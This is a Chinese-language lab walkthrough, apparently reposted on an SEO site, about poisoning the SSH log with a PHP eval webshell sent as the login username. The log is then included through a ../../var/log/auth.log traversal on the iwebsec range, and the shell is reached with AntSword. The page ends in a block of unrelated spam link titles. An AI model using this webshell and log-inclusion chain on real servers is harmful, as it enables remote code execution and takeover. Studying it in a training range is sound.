当前位置: 首页 > wzjs >正文

如何免费做网站91关键词

如何免费做网站,91关键词,软件开发培训班机构,wordpress zip格式目录 日志包含 1.构造恶意ssh登录命令 2.配置ssh日志开启 (1)配置sshd (2)配置rsyslog (3)重启服务 3.写入webshell木马 4.获取php信息渗透 5.蚁剑连接 日志包含 1.构造恶意ssh登录命令 ssh服务…

目录

日志包含

1.构造恶意ssh登录命令

2.配置ssh日志开启

(1)配置sshd

(2)配置rsyslog

(3)重启服务

3.写入webshell木马

4.获取php信息渗透

5.蚁剑连接


日志包含

1.构造恶意ssh登录命令

ssh服务如果开启了日志记录功能,那么在进行ssh连接时会将登录的日志记录到ssh日志文件内,这个文件的默认路径是/var/log/auth.log。那么可以通过将连接用户名设置为恶意代码,用命令连接服务器iwebsec的服务器,这样就可以将恶意代码写入到日志文件中。

用户名设置为为如下一句话木马脚本,参数为ljn

"<?php @eval(\$POST[ljn];?>"

2.配置ssh日志开启

(1)配置sshd

文件地址为/etc/ssh/sshd_config

SyslogFacility AUTHPRIV
LogLevel INFO

(2)配置rsyslog

ubuntu系统中文件地址为/etc/rsyslog.conf

# The authpriv file has restricted access.
authpriv.*                                              /var/log/auth.log

(3)重启服务

配置完毕后务必要记住重启服务,否则修改不生效

service sshd restart
service rsyslog restart

重启后效果如下

为了避免之前/var/log/auth.log中内容对渗透造成影响,故而将此文件先清空,如下所示:

3.写入webshell木马

此实验只是为了验证这个漏洞的存在,故而在iwebsec靶场的容器内执行,如下所示通过用户名向日志写入一句话马,参数为ljn,命令如下所示

ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1

执行完整交互如下所示:

[root@bc23a49cb37c /]# ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).

 查看/var/log/auth.log 文件,发现已经将恶意的一句话木马通过登录用户写入到了ssh登录日志中,如下所示

[root@bc23a49cb37c /]# cat /var/log/auth.log 
Nov 28 07:07:07 bc23a49cb37c sshd[852]: Invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1
Nov 28 07:07:07 bc23a49cb37c sshd[853]: input_userauth_request: invalid user <?php @eval($_POST[ljn]);?>
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed none for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[853]: Connection closed by 127.0.0.1

这里如果没有生成日志的话,建议重启一下sshd服务与rsyslog服务再次重试

service rsyslog restart
Shutting down system logger:                               [  OK  ]
Starting system logger:                                    [  OK  ]

4.获取php信息渗透

ssh登录的日志名为/var/log/auth.log

于是构造日志访问路径 filename=../../../../var/log/auth.log

利用文件包含第01关卡进行渗透

http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.loghttp://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log渗透如下所示

5.蚁剑连接

添加url和密码,分别为http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log和ljn,如下所示

进入文件管理模块

如上所示,渗透成功

http://www.dtcms.com/wzjs/144644.html

相关文章:

  • 网站代码怎么放外链推广论坛
  • 服务网站 建设原则快速将网站seo
  • 宁波英文网站建设杭州seo联盟
  • dw怎么做网站轮播图湖南网站推广优化
  • 网站开发需要几个人咸阳seo
  • 网站推广被封域名如何做跳转网站推广的方式和方法
  • 化工网站建设英国搜索引擎
  • 武汉网络推广广告公司揭阳市seo上词外包
  • 最高法律网站是做啥的友情链接格式
  • 哪个网站ppt模板免费下载腾讯企点是干嘛的
  • 太原网站设计制作百度站长链接提交
  • 护肤网站模版软文推广文章范文1000
  • 展示型网站多少钱seo研究中心晴天
  • 2016做网站免费seo排名优化
  • 使用iis6搭建网站汽油价格最新调整最新消息
  • wordpress 一栏seo综合查询什么意思
  • 上海网络做网站公司高报师培训机构排名
  • 商丘网站建设优化推广万能搜索引擎网站
  • 广州海珠网站制bittorrentkitty磁力猫
  • 建设公寓租房信息网站搜索引擎营销怎么做
  • 广东网站建设服务商百度指数是干嘛的
  • 品牌网站建设哪个好网站排名首页前三位
  • 网站计划电商运营怎么做如何从零开始
  • 网站制作策划方案汕头seo按天付费
  • b2b网站有哪些方面seo技术交流
  • 九江专业网站建设定制电脑软件推广平台
  • 淘宝做推广网站百度销售
  • 山西省三基建设办公室网站宁德市蕉城区
  • 一级a做爰免费网站seo代做
  • 主题商店网站设计怎样做竞价推广